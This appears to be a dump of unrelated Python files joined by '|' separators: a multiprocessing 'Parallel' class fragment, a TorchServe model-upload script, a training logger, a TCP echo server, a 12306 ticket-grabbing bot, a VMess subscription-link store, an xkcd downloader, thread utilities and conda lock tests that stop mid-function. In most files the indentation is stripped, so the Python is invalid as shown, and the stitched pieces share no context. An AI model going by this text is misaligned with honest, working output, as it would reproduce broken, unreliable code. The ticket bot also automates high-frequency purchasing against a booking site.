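    # Illustrative sketch (assumes `add_one` from the class docstring example):
    # `grouped` splits each argument list into `num_jobs` chunks so that every
    # worker handles a whole chunk sequentially, which keeps process-creation
    # overhead low when there are many small tasks.
    #
    #     results = Parallel(4).grouped(add_one, list(range(100))).parallel_results
    #
    # Here each of the (up to) 4 workers receives roughly 25 inputs and returns
    # the list of results for its chunk.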
@property
def meta(self) -> Dict[str, Any]:
return self._rs["__meta__"]
@property
def exceptions(self) -> Dict[str, Any]:
return self._rs["__exceptions__"]
@property
def terminated(self) -> bool:
return self.meta["terminated"]
@property
def parallel_results(self) -> Dict[str, Any]:
return self._rs
@property
def ordered_results(self) -> List[Any]:
return [None if key is None else self._rs[key] for key in self._task_names]
def __sleep(self, skip_check_finished: bool) -> None:
time.sleep(self._sleep + random.random())
self._refresh(skip_check_finished=skip_check_finished)
def __wait(self, wait_until_finished: bool) -> List[int]:
try:
while True:
task_names = ", ".join(
map(
self._get_task_name,
filter(bool, self._working_task_indices),
)
)
self._log_meta_msg(
"waiting for slots (working tasks : {task_names})",
msg_level=logging.DEBUG,
)
finished_slots = []
for i, (task_idx, process) in enumerate(
zip(self._working_task_indices, self._working_processes)
):
if process is None:
self._log_meta_msg(f"pending on slot {i}")
finished_slots.append(i)
continue
task_name = self._get_task_name(task_idx)
if not process.is_alive():
msg = f"in slot {i} is found finished"
self._log_with_meta(task_name, msg)
finished_slots.append(i)
if not wait_until_finished or finished_slots:
return finished_slots
self.__sleep(skip_check_finished=True)
except KeyboardInterrupt:
self._set_terminate(scope="wait")
raise self._ParallelError("Keyboard Interrupted")
def _init_logger(self, task_name: str) -> None:
logging_folder = os.path.join(self._logging_folder, task_name)
os.makedirs(logging_folder, exist_ok=True)
logging_path = os.path.join(logging_folder, f"{timestamp()}.log")
self._setup_logger(task_name, logging_path)
def _refresh(self, skip_check_finished: bool) -> None:
if self._pid2task_idx is None:
self._pid2task_idx = self._resource_manager.pid2task_idx
if not self._resource_manager.inference_usages_initialized:
self._resource_manager.initialize_inference_usages()
if not self._resource_manager.checkpoint_initialized:
return
self._resource_manager.log_pid_usages_and_inference_frees()
self._resource_manager.check()
if not skip_check_finished:
self._wait_and_handle_finish(wait_until_finish=False)
def _wait_and_handle_finish(self, wait_until_finish: bool) -> None:
finished_slots = self.__wait(wait_until_finish)
if not finished_slots:
return
if self.terminated:
self._user_terminate()
finished_bundle = [[], []]
for finished_slot in finished_slots[::-1]:
if self._tqdm_bar is not None:
self._tqdm_bar.update()
tuple(
map(
list.append,
finished_bundle,
map(
list.pop,
[self._working_task_indices, self._working_processes],
[finished_slot] * 2,
),
)
)
for task_idx, process in zip(*finished_bundle):
task_name = self._resource_manager.handle_finish(task_idx, process)
if task_name is None:
continue
self.del_logger(task_name)
def _add_new_processes(self) -> bool:
n_working = len(self._working_processes)
n_new_jobs = self._num_jobs - n_working
n_res = len(self._all_task_indices) - self._cursor
if n_res > 0:
n_new_jobs = min(n_new_jobs, n_res)
for _ in range(n_new_jobs):
new_task_idx = self._all_task_indices[self._cursor]
self._working_processes.append(self._get_process(new_task_idx))
self._working_task_indices.append(new_task_idx)
self._cursor += 1
return True
return n_working > 0
def _user_terminate(self) -> None:
self._log_meta_msg(
"`_user_terminate` method hit, joining processes",
logging.ERROR,
)
for process in self._working_processes:
if process is None:
continue
process.join()
self._log_meta_msg(
"processes joined, raising self._ParallelError",
logging.ERROR,
)
recorded_exceptions = self.exceptions
if not recorded_exceptions:
raise self._ParallelError("Parallel terminated by user action")
else:
raise self._ParallelError("Parallel terminated by unexpected errors")
def _set_terminate(self, **kwargs) -> None:
meta = self.meta
meta["terminated"] = True
self._rs["__meta__"] = meta
if not kwargs:
suffix = ""
else:
suffix = f" ({' ; '.join(f'{k}: {v}' for k, v in kwargs.items())})"
self._log_meta_msg(f"`_set_terminate` method hit{suffix}", logging.ERROR)
def _get_task_name(self, task_idx: int) -> Optional[str]:
if task_idx is None:
return
if self._task_names[task_idx] is None:
self._task_names[task_idx] = f"task_{task_idx}"
task_name = f"{self._task_names[task_idx]}{self.name_suffix}"
self._init_logger(task_name)
return task_name
def _f_wrapper(self, task_idx: int, cuda: int = None) -> Callable:
task_name = self._get_task_name(task_idx)
logger = self._loggers_[task_name]
def log_method(msg, msg_level=logging.INFO, frame=None):
if frame is None:
frame = inspect.currentframe().f_back
self.log_msg(logger, msg, msg_level, frame)
return logger
def _inner(*args):
if self.terminated:
return
try:
log_method("task started", logging.DEBUG)
kwargs = {}
f_wants_cuda = f_wants_log_method = False
f_signature = inspect.signature(self._func)
for name, param in f_signature.parameters.items():
if param.kind is inspect.Parameter.VAR_KEYWORD:
f_wants_cuda = f_wants_log_method = True
break
if name == "cuda":
f_wants_cuda = True
continue
if name == "log_method":
f_wants_log_method = True
continue
if not f_wants_cuda:
if self._use_cuda:
log_method(
"task function doesn't want cuda but cuda is used",
logging.WARNING,
)
else:
log_method("task function wants cuda")
kwargs["cuda"] = cuda
if not f_wants_log_method:
msg = "task function doesn't want log_method"
log_method(msg, logging.WARNING)
else:
log_method("task function wants log_method")
kwargs["log_method"] = log_method
self._rs[task_name] = rs = self._func(*args, **kwargs)
terminate = isinstance(rs, dict) and rs.get("terminate", False)
if not terminate:
log_method("task finished", logging.DEBUG)
except KeyboardInterrupt:
log_method("key board interrupted", logging.ERROR)
return
except Exception as err:
logger.exception(
f"exception occurred, {err}",
extra={"func_prefix": LoggingMixin._get_func_prefix(None)},
)
terminate = True
exceptions = self.exceptions
self._rs[task_name] = rs = err
exceptions[task_name] = rs
self._rs["__exceptions__"] = exceptions
if terminate:
self._set_terminate(scope="f_wrapper", task=task_name)
log_method("task terminated", logging.ERROR)
return _inner
def _get_process(
self,
task_idx: int,
start: bool = True,
) -> Optional[Union[Tuple[Process, Dict[str, Any]], Process]]:
rs = self._resource_manager.get_process(
task_idx,
lambda: self.__sleep(skip_check_finished=False),
start,
)
task_name = rs["__task_name__"]
if not rs["__create_process__"]:
return
if not self._use_cuda or "GPU" not in rs:
args = (task_idx,)
else:
args = (task_idx, rs["GPU"]["tgt_resource_id"])
target = self._f_wrapper(*args)
process = Process(
target=target, args=tuple(args[task_idx] for args in self._args_list)
)
self._log_with_meta(task_name, "process created")
if start:
process.start()
self._log_with_meta(task_name, "process started")
self._record_process(task_idx, process, rs)
return process
return process, rs
def _record_process(
self,
task_idx: int,
process: Optional[Process],
rs: Dict[str, Any],
) -> None:
if process is None:
return
self._resource_manager.record_process(task_idx, process, rs)
__all__ = ["Parallel"]
|
serve.py
|
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import argparse
import binascii
import os
import socket
import sys
import tempfile
import threading
from functools import partial
from getpass import getuser
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer
from typing import List
from urllib.parse import urlparse
import fsspec
import requests
TORCHSERVE_PARAMS = (
"model_name",
"handler",
"runtime",
"batch_size",
"max_batch_delay",
"initial_workers",
"synchronous",
"response_timeout",
)
def parse_args(argv: List[str]) -> argparse.Namespace:
parser = argparse.ArgumentParser(
description="uploads the provided model to torchserve",
)
parser.add_argument(
"--model_path",
type=str,
help="model to serve",
required=True,
)
parser.add_argument(
"--management_api",
type=str,
help="address of the management api. e.g. http://localhost:8081",
required=True,
)
parser.add_argument(
"--timeout",
type=int,
help="timeout for requests to management api",
default=60,
)
parser.add_argument(
"--dryrun",
action="store_true",
help=argparse.SUPPRESS,
)
parser.add_argument(
"--port",
type=int,
help="""port for the HTTP file server to listen on when torchserve is loading the model.
This must be accessible from the torchserve instance.""",
default=8222,
)
# arguments from https://pytorch.org/serve/management_api.html#register-a-model
for param in TORCHSERVE_PARAMS:
parser.add_argument(
f"--{param}",
type=str,
help=f"""torchserve parameter {param}.
See https://pytorch.org/serve/management_api.html#register-a-model""",
)
return parser.parse_args(argv)
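# Example invocation (hypothetical paths and addresses):
#
#     python serve.py \
#         --model_path s3://my-bucket/models/resnet.mar \
#         --management_api http://torchserve.internal:8081 \
#         --model_name resnet --initial_workers 1 --synchronous true
#
# Any TORCHSERVE_PARAMS supplied this way are forwarded verbatim as query
# parameters to the management API's register-model call in main().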
def get_routable_ip_to(addr: str) -> str:
"""
get_routable_ip_to opens a dummy connection to the target HTTP URL and
returns the IP address used to connect to it.
"""
parsed = urlparse(addr)
    # create the socket before entering the try block so that the finally
    # clause never references an unbound name if socket creation itself fails
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
s.connect((parsed.hostname, parsed.port or 80))
return s.getsockname()[0]
finally:
s.close()
def rand_id() -> str:
id = binascii.b2a_hex(os.urandom(8)).decode("utf-8")
return f"{getuser()}_{id}"
def main(argv: List[str]) -> None:
args = parse_args(argv)
if args.dryrun:
print("App serve started successfully")
return
with tempfile.TemporaryDirectory() as tmpdir:
model_name = args.model_name or "model"
model_file = f"{model_name}_{rand_id()}.mar"
model_path = os.path.join(tmpdir, model_file)
print(f"downloading model from {args.model_path} to {model_path}...")
fs, _, rpaths = fsspec.get_fs_token_paths(args.model_path)
assert len(rpaths) == 1, "must have single path"
fs.get(rpaths[0], model_path)
addr = ("", args.port)
print(f"starting HTTP server at {addr}...")
handler_class = partial(SimpleHTTPRequestHandler, directory=tmpdir)
server: ThreadingHTTPServer = ThreadingHTTPServer(addr, handler_class)
try:
def serve() -> None:
server.serve_forever()
t = threading.Thread(target=serve)
t.start()
ip_address = get_routable_ip_to(args.management_api)
model_url = f"http://{ip_address}:{server.server_port}/{model_file}"
print(f"serving file at {model_url}")
url = f"{args.management_api}/models"
print(f"POST {url}")
payload = {
"url": model_url,
}
for param in TORCHSERVE_PARAMS:
v = getattr(args, param)
if v is not None:
payload[param] = v
r = requests.post(url, params=payload, timeout=args.timeout)
print(r.text)
r.raise_for_status()
finally:
print("shutting down...")
server.shutdown()
if __name__ == "__main__":
main(sys.argv[1:])
|
infolog.py
|
import atexit
import json
from datetime import datetime
from threading import Thread
from urllib.request import Request, urlopen
_format = '%Y-%m-%d %H:%M:%S.%f'
_file = None
_run_name = None
_slack_url = None
def init(filename, run_name, slack_url=None):
global _file, _run_name, _slack_url
_close_logfile()
_file = open(filename, 'a')
_file.write('\n-----------------------------------------------------------------\n')
_file.write('Starting new {} training run\n'.format(run_name))
_file.write('-----------------------------------------------------------------\n')
_run_name = run_name
_slack_url = slack_url
def log(msg, end='\n', slack=False):
print(msg, end=end)
if _file is not None:
_file.write('[%s] %s\n' % (datetime.now().strftime(_format)[:-3], msg))
if slack and _slack_url is not None:
Thread(target=_send_slack, args=(msg,)).start()
def _close_logfile():
global _file
if _file is not None:
_file.close()
_file = None
def _send_slack(msg):
req = Request(_slack_url)
req.add_header('Content-Type', 'application/json')
urlopen(req, json.dumps({
'username': 'tacotron',
'icon_emoji': ':taco:',
'text': '*%s*: %s' % (_run_name, msg)
}).encode())
atexit.register(_close_logfile)
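# Minimal usage sketch (hypothetical file name and webhook URL):
#
#     import infolog
#     infolog.init('logs/train.log', run_name='tacotron-demo',
#                  slack_url='https://hooks.slack.com/services/XXX')
#     infolog.log('Step 100: loss=0.123')            # console + log file
#     infolog.log('Training finished', slack=True)   # also posted to Slack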
|
tcp-server.py
|
#!/usr/bin/env python
# coding: utf-8
import socket
import threading
bind_ip = '0.0.0.0'
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
# allow up to 5 queued connections (listen backlog)
server.listen(5)
print('[*] Listening on %s:%d' % (bind_ip, bind_port))
# thread worker: handle a single client connection
def handle_client(client_socket):
    # print out the received data
    request = client_socket.recv(1024)
    print('[*] Received: %s' % request)
    # send back an acknowledgement (as bytes, so this also works on Python 3)
    client_socket.send(b'ACK!')
client_socket.close()
# main server loop
while True:
client, addr = server.accept()
print('[*] Accepted connection from: %s:%d' % (addr[0], addr[1]))
    # spawn a thread to handle the client request
client_handler = threading.Thread(target=handle_client, args=(client,))
client_handler.start()
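# Minimal client sketch for exercising this server (run from a second
# terminal; assumes the server is listening on localhost:9999):
#
#     import socket
#     client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#     client.connect(('127.0.0.1', 9999))
#     client.send(b'Hello')
#     print(client.recv(4096))   # expects b'ACK!'
#     client.close()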
|
select_ticket_info.py
|
# -*- coding=utf-8 -*-
import datetime
import random
import os
import socket
import sys
import threading
import time
import TickerConfig
import wrapcache
from agency.cdn_utils import CDNProxy, open_cdn_file
from config import urlConf, configCommon
from config.TicketEnmu import ticket
from config.configCommon import seat_conf_2, seat_conf
from config.getCookie import getDrvicesID
from init.login import GoLogin
from inter.AutoSubmitOrderRequest import autoSubmitOrderRequest
from inter.ChechFace import chechFace
from inter.CheckUser import checkUser
from inter.GetPassengerDTOs import getPassengerDTOs
from inter.LiftTicketInit import liftTicketInit
from inter.Query import query
from inter.SubmitOrderRequest import submitOrderRequest
from myException.PassengerUserException import PassengerUserException
from myException.UserPasswordException import UserPasswordException
from myException.ticketConfigException import ticketConfigException
from myException.ticketIsExitsException import ticketIsExitsException
from myException.ticketNumOutException import ticketNumOutException
from myUrllib.httpUtils import HTTPClient
class select:
"""
快速提交车票通道
"""
def __init__(self):
self.cdn_list = open_cdn_file("filter_cdn_list")
self.get_ticket_info()
self._station_seat = [seat_conf[x] for x in TickerConfig.SET_TYPE]
self.auto_code_type = TickerConfig.AUTO_CODE_TYPE
self.httpClint = HTTPClient(TickerConfig.IS_PROXY, self.cdn_list)
self.httpClint.cdn = self.cdn_list[random.randint(0, 4)]
self.urls = urlConf.urls
self.login = GoLogin(self, TickerConfig.IS_AUTO_CODE, self.auto_code_type)
self.cookies = ""
self.queryUrl = "leftTicket/queryO"
self.passengerTicketStrList = ""
self.passengerTicketStrByAfterLate = ""
self.oldPassengerStr = ""
self.set_type = ""
self.flag = True
@staticmethod
def get_ticket_info():
"""
获取配置信息
:return:
"""
print(u"*" * 50)
print(f"检查当前版本为: {TickerConfig.RE_VERSION}")
version = sys.version.split(" ")[0]
print(u"检查当前python版本为:{},目前版本只支持3.6以上".format(version))
if version < "3.6.0":
raise Exception
print(u"12306刷票小助手"
)
print(
f"当前配置:\n出发站:{TickerConfig.FROM_STATION}\n到达站:{TickerConfig.TO_STATION}\n车次: {','.join(TickerConfig.STATION_TRAINS) or '所有车次'}\n乘车日期:{','.join(TickerConfig.STATION_DATES)}\n坐席:{','.join(TickerConfig.SET_TYPE)}\n是否有票优先提交:{TickerConfig.IS_MORE_TICKET}\n乘车人:{TickerConfig.TICKET_PEOPLES}\n" \
f"刷新间隔: 随机(1-3S)\n僵尸票关小黑屋时长: {TickerConfig.TICKET_BLACK_LIST_TIME}\n下单接口: {TickerConfig.ORDER_TYPE}\n下单模式: {TickerConfig.ORDER_MODEL}\n预售踩点时间:{TickerConfig.OPEN_TIME}")
print(u"*" * 50)
def station_table(self, from_station, to_station):
"""
读取车站信息
:param station:
:return:
"""
path = os.path.join(os.path.dirname(__file__), '../station_name.txt')
try:
with open(path, encoding="utf-8") as result:
info = result.read().split('=')[1].strip("'").split('@')
except Exception:
with open(path) as result:
info = result.read().split('=')[1].strip("'").split('@')
del info[0]
station_name = {}
for i in range(0, len(info)):
n_info = info[i].split('|')
station_name[n_info[1]] = n_info[2]
try:
from_station = station_name[from_station.encode("utf8")]
to_station = station_name[to_station.encode("utf8")]
except KeyError:
from_station = station_name[from_station]
to_station = station_name[to_station]
return from_station, to_station
def call_login(self, auth=False):
"""
登录回调方法
:return:
"""
if auth:
return self.login.auth()
else:
            configCommon.checkSleepTime(self)  # avoid hitting the scheduled night-time sleep right after starting
self.login.go_login()
def main(self):
l = liftTicketInit(self)
l.reqLiftTicketInit()
getDrvicesID(self)
self.call_login()
check_user = checkUser(self)
t = threading.Thread(target=check_user.sendCheckUser)
t.setDaemon(True)
t.start()
from_station, to_station = self.station_table(TickerConfig.FROM_STATION, TickerConfig.TO_STATION)
num = 0
s = getPassengerDTOs(selectObj=self, ticket_peoples=TickerConfig.TICKET_PEOPLES)
passenger = s.sendGetPassengerDTOs()
wrapcache.set("user_info", passenger, timeout=9999999)
now = datetime.datetime.now()
        if TickerConfig.ORDER_MODEL == 1:
            print(f"Pre-sale has not started yet, waiting; pre-sale opens at {TickerConfig.OPEN_TIME}, current time: {now.strftime('%H:%M:%S')}")
            sleep_time_s = 0.1
            sleep_time_t = 0.3
            # Tests show a microsecond-level offset (e.g. 2019-01-02 22:30:00.004555), which should be harmless.
            # The pre-sale request is still affected by the previous refresh; no better solution for now.
            while now.strftime("%H:%M:%S") < TickerConfig.OPEN_TIME:
                now = datetime.datetime.now()
                time.sleep(0.0001)
            print(f"Pre-sale started, opening time: {now.strftime('%H:%M:%S')}")
else:
sleep_time_s = TickerConfig.MIN_TIME
sleep_time_t = TickerConfig.MAX_TIME
while 1:
try:
num += 1
                now = datetime.datetime.now()  # thanks to a group member for the on-the-hour timing code
                configCommon.checkSleepTime(self)  # sleep during the scheduled night-time window
q = query(selectObj=self,
from_station=from_station,
to_station=to_station,
from_station_h=TickerConfig.FROM_STATION,
to_station_h=TickerConfig.TO_STATION,
_station_seat=self._station_seat,
station_trains=TickerConfig.STATION_TRAINS,
station_dates=TickerConfig.STATION_DATES,
ticke_peoples_num=len(TickerConfig.TICKET_PEOPLES),
)
queryResult = q.sendQuery()
                # handle the query API result
if queryResult.get("status"):
train_no = queryResult.get("train_no", "")
train_date = queryResult.get("train_date", "")
stationTrainCode = queryResult.get("stationTrainCode", "")
secretStr = queryResult.get("secretStr", "")
secretList = queryResult.get("secretList", "")
seat = queryResult.get("seat", "")
leftTicket = queryResult.get("leftTicket", "")
query_from_station_name = queryResult.get("query_from_station_name", "")
query_to_station_name = queryResult.get("query_to_station_name", "")
is_more_ticket_num = queryResult.get("is_more_ticket_num", len(TickerConfig.TICKET_PEOPLES))
if wrapcache.get(train_no):
print(ticket.QUEUE_WARNING_MSG.format(train_no))
else:
                        # fetch passenger (contact) information
s = getPassengerDTOs(selectObj=self, ticket_peoples=TickerConfig.TICKET_PEOPLES,
set_type="" if isinstance(seat, list) else seat_conf_2[seat],
                                             # waitlist orders need multiple seat types
is_more_ticket_num=is_more_ticket_num)
getPassengerDTOsResult = s.getPassengerTicketStrListAndOldPassengerStr(secretStr, secretList)
if getPassengerDTOsResult.get("status", False):
self.passengerTicketStrList = getPassengerDTOsResult.get("passengerTicketStrList", "")
self.passengerTicketStrByAfterLate = getPassengerDTOsResult.get(
"passengerTicketStrByAfterLate", "")
self.oldPassengerStr = getPassengerDTOsResult.get("oldPassengerStr", "")
self.set_type = getPassengerDTOsResult.get("set_type", "")
                            # submit the order
                            # there are two kinds of orders: normal orders and waitlist (candidate) orders
                            if secretStr:  # normal order
                                if TickerConfig.ORDER_TYPE == 1:  # fast one-click order
a = autoSubmitOrderRequest(selectObj=self,
secretStr=secretStr,
train_date=train_date,
passengerTicketStr=self.passengerTicketStrList,
oldPassengerStr=self.oldPassengerStr,
train_no=train_no,
stationTrainCode=stationTrainCode,
leftTicket=leftTicket,
set_type=self.set_type,
query_from_station_name=query_from_station_name,
query_to_station_name=query_to_station_name,
)
a.sendAutoSubmitOrderRequest()
                                elif TickerConfig.ORDER_TYPE == 2:  # regular order
sor = submitOrderRequest(self, secretStr, from_station, to_station, train_no,
self.set_type,
self.passengerTicketStrList, self.oldPassengerStr, train_date,
TickerConfig.TICKET_PEOPLES)
sor.sendSubmitOrderRequest()
                            elif secretList:  # waitlist order
c = chechFace(self, secretList, train_no)
c.sendChechFace()
else:
random_time = round(random.uniform(sleep_time_s, sleep_time_t), 2)
                    nateMsg = ' no waitlist chance' if TickerConfig.ORDER_TYPE == 2 else ""
print(f"正在第{num}次查询 停留时间:{random_time} 乘车日期: {','.join(TickerConfig.STATION_DATES)} 车次:{','.join(TickerConfig.STATION_TRAINS) or '所有车次'} 下单无票{nateMsg} 耗时:{(datetime.datetime.now() - now).microseconds / 1000} {queryResult.get('cdn')}")
time.sleep(random_time)
except PassengerUserException as e:
print(e)
break
except ticketConfigException as e:
print(e)
break
except ticketIsExitsException as e:
print(e)
break
except ticketNumOutException as e:
print(e)
break
except UserPasswordException as e:
print(e)
break
except ValueError as e:
                if str(e) == "No JSON object could be decoded":
                    print("12306 API returned no response, retrying")
                else:
                    print(e)
except KeyError as e:
print(e)
except TypeError as e:
print(u"12306接口无响应,正在重试 {0}".format(e))
except socket.error as e:
print(e)
if __name__ == '__main__':
s = select()
cdn = s.station_table("长沙", "深圳")
|
VMes_IO.py
|
from spiderNest.preIntro import *
from MiddleKey.redis_IO import RedisClient
from config import SYS_AIRPORT_INFO_PATH, REDIS_KEY_NAME_BASE
import threading
path_ = SYS_AIRPORT_INFO_PATH
def save_login_info(VMess, class_):
"""
    Store a VMess link.
class_: ssr or v2ray
"""
# redis loaded
# RedisClient().add(key_name=REDIS_KEY_NAME_BASE.format(class_), value_of_link_attr=VMess)
threading.Thread(target=RedisClient().add, args=(REDIS_KEY_NAME_BASE.format(class_), VMess)).start()
# static data loaded
now = str(datetime.now()).split('.')[0]
with open(path_, 'a', encoding='utf-8', newline='') as f:
writer = csv.writer(f)
        # stored-at time, VMess link, class, initial state: 0 (unused)
writer.writerow(['{}'.format(now), '{}'.format(VMess), class_, '0'])
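# Minimal usage sketch of save_login_info (the link below is a placeholder, not a
# real VMess URI): the call pushes the link into Redis on a background thread and
# appends an audit row with state '0' (unused) to the CSV at SYS_AIRPORT_INFO_PATH.
#   save_login_info('vmess://example-encoded-link', 'v2ray')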
def vmess_IO(class_):
"""
    Fetch an available subscription link and refresh the storage pool.
class_: ssr ; v2ray
"""
def refresh_log(dataFlow):
with open(path_, 'w', encoding='utf-8', newline='') as f:
writer = csv.writer(f)
writer.writerows(dataFlow)
try:
with open(path_, 'r', encoding='utf-8') as f:
reader = csv.reader(f)
vm_q = [vm for vm in reader]
new_q = vm_q
for i, value in enumerate(reversed(vm_q)):
if value[-1] == '0' and value[-2] == class_:
vm = value[1]
new_q[-(i + 1)][-1] = '1'
break
refresh_log(new_q)
return vm
except UnboundLocalError:
        return 'No available subscription link'
def avi_num():
from datetime import datetime, timedelta
with open(path_, 'r', encoding='utf-8') as f:
reader = csv.reader(f)
vm_list = [i for i in reader]
# ['2020-08-06 04:27:59', 'link','class_', '1']
vm_q = [vm for vm in vm_list if vm[-1] == '0']
tag_items = ''
for vm in vm_list:
if vm[-1] == '0':
bei_ing_time = datetime.fromisoformat(vm[0]) + timedelta(hours=12)
                tag_items += '\n[Available][{}] #{}'.format(bei_ing_time, vm[-2])
return tag_items
|
test_gevent_process.py
|
import time
from gevent import monkey
monkey.patch_all()
from multiprocessing import Process
print(6666)
def f(x):
print(x)
time.sleep(10000)
if __name__ == '__main__':
[Process(target=f, args=(2,)).start() for i in range(2)]
|
xkcd_download_multithread.py
|
#! python3
# Download every single XKCD comic - multithreaded version
import bs4, requests, os, threading, time
#url = 'http://xkcd.com'
os.makedirs('xkcd', exist_ok=True) # exist_ok prevents from exception if folder already exists
def download_xkcd(start, end):
for url_number in range(start, end):
res = requests.get('http://xkcd.com/' + str(url_number))
res.raise_for_status()
soup = bs4.BeautifulSoup(res.text, 'lxml')
check_image_link = soup.select('#comic img')
if not check_image_link:
print('Cannot find the image')
else:
            image_link = check_image_link[0].get('src')
            # download the image itself (the src attribute is protocol-relative, e.g. //imgs.xkcd.com/...),
            # not the comic page that is already held in res
            print('Downloading image {0}...'.format(image_link))
            image_res = requests.get('http:' + image_link)
            image_res.raise_for_status()
            #time.sleep(1)
            # saving image in previously created folder
            image_file = open(os.path.join('xkcd', os.path.basename(image_link)), 'wb')
            for chunk in image_res.iter_content(100000):
                image_file.write(chunk)
            image_file.close()
download_threads = [] # keep all threads objects
for i in range(1, 100, 10):  # creates 10 threads, each downloading a block of 10 comics (1-100 in total)
    download_thread = threading.Thread(target=download_xkcd, args=(i, i + 10))  # end is exclusive, so i+10 keeps the blocks contiguous
download_threads.append(download_thread)
download_thread.start() # running download_thread function
for download_thread in download_threads:
download_thread.join() # Waiting until all threads are finished
print("Done")
|
threads.py
|
from abc import abstractmethod, ABCMeta
from threading import Event, Thread
class CustomThread(object, metaclass=ABCMeta):  # Python 3 metaclass syntax; the old __metaclass__ attribute is ignored
def __init__(self):
self._task = None
self._before_task = self.dummy_task
self._after_task = self.dummy_task
self._task_args = []
self._task_kwargs = {}
self.thread = None
@property
def task_args(self):
return self._task_args
@task_args.setter
def task_args(self, args):
self._task_args = args
@property
def task_kwargs(self):
return self._task_kwargs
@task_kwargs.setter
def task_kwargs(self, kwargs):
self._task_kwargs = kwargs
@property
def before_task(self):
"""
Called before infinite loop
"""
return self._before_task
@before_task.setter
def before_task(self, task):
self._before_task = task
@property
def after_task(self):
"""
Called after loop
"""
return self._after_task
@after_task.setter
def after_task(self, task):
self._after_task = task
def join(self):
self.thread.join()
@property
def task(self):
return self._task
@task.setter
def task(self, task):
self._task = task
@abstractmethod
def stop(self):
pass
@abstractmethod
def pause(self):
pass
@abstractmethod
def resume(self):
pass
@abstractmethod
def start(self):
pass
class InfiniteThread(CustomThread):
def __init__(self):
CustomThread.__init__(self)
self._pause = Event()
self.running = False
def start(self):
if (not self.running) and (self._task):
self.running = True
self._pause.set()
self.thread = Thread(target=self.loop)
self.thread.start()
def stop(self):
if self.running:
self.running = False
def pause(self):
self._pause.clear()
def resume(self):
self._pause.set()
def loop(self):
self._before_task()
while self.running:
self._pause.wait()
self._task(*self._task_args, **self._task_kwargs)
self._after_task()
def dummy_task(self):
pass
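# Minimal usage sketch (the heartbeat task is hypothetical) showing how the
# InfiniteThread API above is meant to be driven: assign a task, start the loop
# thread, pause/resume via the internal Event, then stop and join.
if __name__ == "__main__":
    import time

    def heartbeat(label):
        print("tick", label)
        time.sleep(0.5)

    worker = InfiniteThread()
    worker.task = heartbeat
    worker.task_args = ["demo"]
    worker.start()    # runs before_task once, then loops heartbeat("demo")
    time.sleep(2)
    worker.pause()    # the loop blocks on the Event until resume() is called
    worker.resume()
    worker.stop()     # the loop exits after the current iteration; after_task runs
    worker.join()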
|
console.py
|
'''
Created on 15/09/2015
@author: david
'''
import time
from threading import Thread
class ConsoleLink(object):
'''
    Emulates a link, showing the output through the console
'''
def __init__(self):
self._emulatedProcessingTime = 3
def setEmulatedProcessingTime(self, time):
self._emulatedProcessingTime = time
def getEmulatedProcessingTime(self):
return self._emulatedProcessingTime
def open(self):
print("ConsoleLink open.")
def send(self, message, callback=None):
print(str(message))
        if callback is not None:
Thread(target=self._receive, kwargs=dict(callback=callback)).start()
def _receive(self, callback):
time.sleep(self._emulatedProcessingTime)
callback(None)
def close(self):
print("ConsoleLink closed.")
|
test_lock.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2012 Anaconda, Inc
# SPDX-License-Identifier: BSD-3-Clause
import pytest
from conda.lock import DirectoryLock, FileLock, LockError
from os.path import basename, exists, isfile, join
def test_filelock_passes(tmpdir):
"""
Normal test on file lock
"""
package_name = "conda_file1"
tmpfile = join(tmpdir.strpath, package_name)
with FileLock(tmpfile) as lock:
path = basename(lock.lock_file_path)
assert tmpdir.join(path).exists() and tmpdir.join(path).isfile()
# lock should clean up after itself
assert not tmpdir.join(path).exists()
def test_filelock_locks(tmpdir):
"""
    Test of file lock: multiple locks on the same file
    should raise LockError
"""
package_name = "conda_file_2"
tmpfile = join(tmpdir.strpath, package_name)
with FileLock(tmpfile) as lock1:
path = basename(lock1.lock_file_path)
assert tmpdir.join(path).exists()
with pytest.raises(LockError) as execinfo:
with FileLock(tmpfile, retries=1) as lock2:
assert False # this should never happen
assert lock2.path_to_lock == lock1.path_to_lock
assert tmpdir.join(path).exists() and tmpdir.join(path).isfile()
# lock should clean up after itself
assert not tmpdir.join(path).exists()
def test_folder_locks(tmpdir):
"""
Test on Directory lock
"""
package_name = "dir_1"
tmpfile = join(tmpdir.strpath, package_name)
with DirectoryLock(tmpfile) as lock1:
assert exists(lock1.lock_file_path) and isfile(lock1.lock_file_path)
with pytest.raises(LockError) as execinfo:
with DirectoryLock(tmpfile, retries=1) as lock2:
assert False # this should never happen
assert exists(lock1.lock_file_path) and isfile(lock1.lock_file_path)
# lock should clean up after itself
assert not exists(lock1.lock_file_path)
def test_lock_thread(tmpdir):
"""
    Two threads want to lock a file
    One thread will have LockError raised
"""
def lock_thread(tmpdir, file_path):
with FileLock(file_path) as lock1:
path = basename(lock1.lock_file_path)
assert tmpdir.join(path).exists() and tmpdir.join(path).isfile()
assert not tmpdir.join(path).exists()
from threading import Thread
package_name = "conda_file_3"
tmpfile = join(tmpdir.strpath, package_name)
t = Thread(target=lock_thread, args=(tmpdir, tmpfile))
with FileLock(tmpfile) as lock1:
t.start()
path = basename(lock1.lock_file_path)
assert tmpdir.join(path).exists() and tmpdir.join(path).isfile()
t.join()
# lock should clean up after itself
assert not tmpdir.join(path).exists()
def test_lock_retries(tmpdir):
"""
    Two threads want to lock the same file
    The lock has zero retries
    One thread will have LockError raised
"""
def lock_thread_retries(tmpdir, file_path):
with pytest.raises(LockError) as execinfo:
with FileLock(file_path, retries=0):
assert False # should never enter here, since max_tries is 0
assert "LOCKERROR" in str(execinfo.value)
from threading import Thread
package_name = "conda_file_3"
tmpfile = join(tmpdir.strpath, package_name)
t = Thread(target=lock_thread_retries, args=(tmpdir, tmpfile))
with FileLock(tmpfile) as lock1:
t.start()
path = basename(lock1.lock_file_path)
assert tmpdir.join(path).exists() and tmpdir.join(path).isfile()
t.join()
# lock should clean up after itself
assert not tmpdir.join(path).exists()
def test_permission_file():
"""
Test when lock cannot be created due to permission
    Make sure no exception is raised
"""
from conda.auxlib.compat import Utf8NamedTemporaryFile
from conda.common.compat import text_type
with Utf8NamedTemporaryFile(mode='r') as f:
